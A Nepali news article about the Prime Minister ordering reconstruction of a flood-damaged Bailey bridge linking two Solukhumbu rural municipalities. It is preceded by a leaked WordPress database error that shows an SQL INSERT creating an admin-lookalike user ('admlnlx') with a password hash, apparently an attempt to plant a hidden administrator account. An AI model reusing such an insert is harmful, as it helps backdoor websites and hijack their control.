WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2uFeaRdsen7z.PR9rKh9EuwbI56F9.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 21:53:01', '', 'admlnlx', 'admlnlx')
काठमाडौं । सोलुखुम्बु जिल्लाको थुलुङ दुधकोशी गाउँपालिका र सोताङ गाउँपालिका जोड्ने दिप्लीघाट बेलिबृजको पुन: निर्माण तत्काल अघि बढाउन प्रधानमन्त्री पुष्पकमल दाहाल प्रचन्डले निर्देशन दिनुभएको छ।
थुलुङ दुधकोशी गाउँपालिका अध्यक्ष अशिम राई नेतृत्वको टोलीले सोमबार प्रधानमन्त्री प्रचण्डसंग भेट गरी बेलिबृज पुनः निर्माणका लागि आग्रह गरेपछि भौतिक पूर्बाधार तथा यातायातमन्त्री प्रकाश ज्वालालाई फोन गरि सो निर्देशन दिनुभएको थुलुङ दुधकोशी गाउँपालिका प्रबत्त भोजराज कर्किले बताए ।
प्रबत्ता कार्किका अनुसार अध्यक्ष राईसहित टोलिमा महाकुलुङ गाउँपालिका अध्यक्ष सूर्य कुलुङ, सोताङ गाउँपालिका अध्यक्ष खिलराज बस्नेत लगायत सहभागी थिए ।
प्रधानमन्त्री कार्यालयबाट भौतिक पुर्बाधार मन्त्रालयमा पठाईएको सो पत्रमा सम्बन्धित कार्यालयलाई तोक आदेश भएको र बांकी काम भोलि हुने प्रबत्ता कार्किले बताए ।
थुलुङ दुधकोशी र सोताङ गाउँपालिका जोड्ने सो बेलिबृज दुधकोशी नदीमा गत बिहीवार आएको भीषण बाढीका कारण क्षतिग्रस्त हुन पुगेको थियो । आइतबार प्राविधिक टोलि र सुरक्षा निकाय सहित स्थलगत निरीक्षणमा पुगेर त्यहाँको बास्तविकताको थप अध्ययन र कोशी पारीका नागरिक र करिब ४० भन्दा बढी यातायात व्यवसायीको गुनासो सुनेपछि राती नै आफू गाउँबाट हिंडेर आज बिहान काठमाडौं आईपुगेको थुलुङ दुधकोशी गाउँपालिका राईले बताए ।
बेलिबृजमा भएको क्षतिले कोशी पारिका २१ हजार बढी नागरिकको सदरमुकाम, प्रदेश र केन्द्र राजधानीसग सिधा यातायातको सपर्क टुटेको छ ।
प्रधानमन्त्री प्रचण्डले समस्या समाधानका लागि देखाउनु भएको तत्परताले बेलिबृजको पुनः निर्माण छिटो भइ विद्यमान समस्या समाधान हुने आशा पलाएको महाकुलुङ गाउँपालिका अध्यक्ष सुर्य कुलुङको प्रतिक्रिया छ ।